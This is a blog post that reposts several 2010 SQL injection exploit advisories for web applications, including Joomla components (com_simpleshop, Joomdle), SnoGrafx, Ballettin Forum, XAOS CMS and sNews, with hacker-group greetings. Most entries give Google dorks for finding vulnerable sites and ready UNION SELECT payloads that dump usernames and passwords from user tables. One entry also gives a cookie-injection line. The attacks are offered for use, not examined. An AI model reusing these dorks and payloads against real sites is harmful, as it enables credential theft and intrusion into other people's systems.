Hail Freedom, my congratulations for those of you who until today are still keen to continue to learn and work, regardless of your original purpose for conducting the process Injetion .. on this night, in accompany with a little coffee the rest of the bosses (I understand that only the maid), I'll bit you gave the bug to the bug sql injection, along with his Author.;
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Vendor : http://www.conceptinternetltd.com/ecommerce.php
http://www.conceptinternetltd.com/brochure.php
# Software : ubuntu 10.04
# Date : 31/07/2010
# by : gendenk
# Site : http://jatimcrew.org
# Dork intext : "Website by conceptinternetltd"
# Exploit : [site]/product_list.php?id=[SQL Injection]
# Exploit : [site]/news.php?id==[SQL Injection]
#######################################
# Demo
# http://localhost/product_desc.php?id=979 [SQL Injection]
# Demo:
# http://localhost/news.php?id=[SQL Injection]
#######################################
Dedicated For : Sekuritionline, Jatimcrew and Hacbox Crew
Life is challanging, the fear of challanges, causing you for backwardness..Facing for the bright future..
#Thanks to :
ALLAH SWT dan Nabi Muhammad SAW, BAPAK Koe dan Almarhum Ibu Koe....
Cyberlog, Cr4wl3r, Byz9991, Darkavanger, Newbie_Campuz,Unixcode,Bom2stalker, Phoenixhaxor, Xcyberx, Shamus and MAMA Sri Rahayu [ istri cyberlog ] Semoga Cepet Sembuh..
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
########################################################################################
SnoGrafx (cat.php?cat) SQL Injection Vulnerability
########################################################################################
Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by SnoGrafx"
Download Page : http://snografx.com/
########################################################################################
Sql Injection:
http://localhost/[path]/cat.php?cat=2' (Sql)
########################################################################################
Thanks cyber-warrior.org & e-banka.org
########################################################################################
Joomla Component (com_simpleshop) SQL Injection Vulnerability
==============================================================
###########################
Title : Joomla Component (com_simpleshop) SQL Injection Vulnerability
Script : Joomla Galore Simple Shop
Date : 07/26/2010
Author : UnD3rGr0unD W4rri0rZ
Vendor : http://galore.co.za/
Dork : inurl:"option=com_simpleshop" & inurl:"viewprod"
###########################
[ Vulnerable File ]
[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]
[SQL]:
id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
Xpl
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
##############################################################
#==================================================
#{~} I am HeaDShoT(tunisian muslim hacker) From UnD3rGr0unD W4rri0rZ {~}
#
#cont@ct:
#pwz@hotmail.Fr
#
#{~} there is always one who intelligent more than you do you should be optimistic {~}
#==================================================
#all greetZ to allah
#&
# my friends
# M4MIM4N // L363ND //Meher Assel // Ghost_tn //ta3lab el maker // Th3 m3t4l-m4n
#
##############################################################
====================================================================
# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
# Date: 25/07/2010
# Author: 3v0 aka evolution
# Software Link: http://www.ballettin.com
# Tested on: Windows Xp Pack 3
====================================================================
#1 - Vulnerable File
------------------------------------------------------
[+] File: http://www.site.com/alinti.php?mesajid=[SQL]
[+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
#2 - Insecure Cookie
------------------------------------------------------
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
After go to http://www.site.com/ust.php
====================================================================
# Exploit Title: XAOS CMS SQL Injection Vulnerability
# Date: 25/07/2010
# Author: H-SK33PY
# Software Link: http://www.xaos.it/
# Version: N/A
# Google dork : Powered by XAOS systems
# Platform / Tested on: linux
# Category: webapplications
# Code : [SQLi] & [BSQLi]
010101010101010101010101010101010101010101010101010101010
0 0
1 Iranian Datacoders Security Team 2010
0 0
010101010101010101010101010101010101010101010101010101010
#BUG:#########################################################################
After find bug on the sites , run this :
http://site.com/index.php?m=1[SQLi]
If you can not inject run Blind SQL Injection
http://site.com/index.php?m=1[BSQLi]
#############################################################################
Website : http://www.datacoders.ir
Special Thanks to : ccC0d3rZzz & all iranian datacoders members
#############################################################################
[!]===========================================================================[!]
[~] Joomla Component Joomdle SQL vulnerability
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 24 july, 2010
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : http://www.joomdle.com/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://sourceforge.net/projects/moodle-joomla/files/
[+] Version : 0.24 or lower ;)
[!]===========================================================================[!]
[ Live From JoGJa . . . ]
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=[INDONESIANCODER]
[ XpL ]
-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz
[ d3m0 ]
http://www.site.com/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz
etc etc etc ;]
[ INFO ]
[+] in this component using mdl_user NOT jos_users ;) [+]
[!]===========================================================================[!]
[ Thx TO ]
[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n
[+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku
[ NOTE ]
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] ndue tonggo mbek sedulur kok koyo anj*ng
[+] Poker ;)
[+] sendiri di pagi hari sambil merokok menikmati indahnya pagi ;)
[ QUOTE ]
[+] INDONESIANCODER still r0x
########################################################################################
sNews v1.7 (index.php?category) SQL Injection Vulnerability |
######################################################################################## |
Author Web Page : http://www.ipbul.org |
######################################################################################## |
http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8 |
######################################################################################## |
Thanks http://e-banka.org & http://www.cyber-warrior.org |
########################################################################################
Related Articles :
0 komentar:
Posting Komentar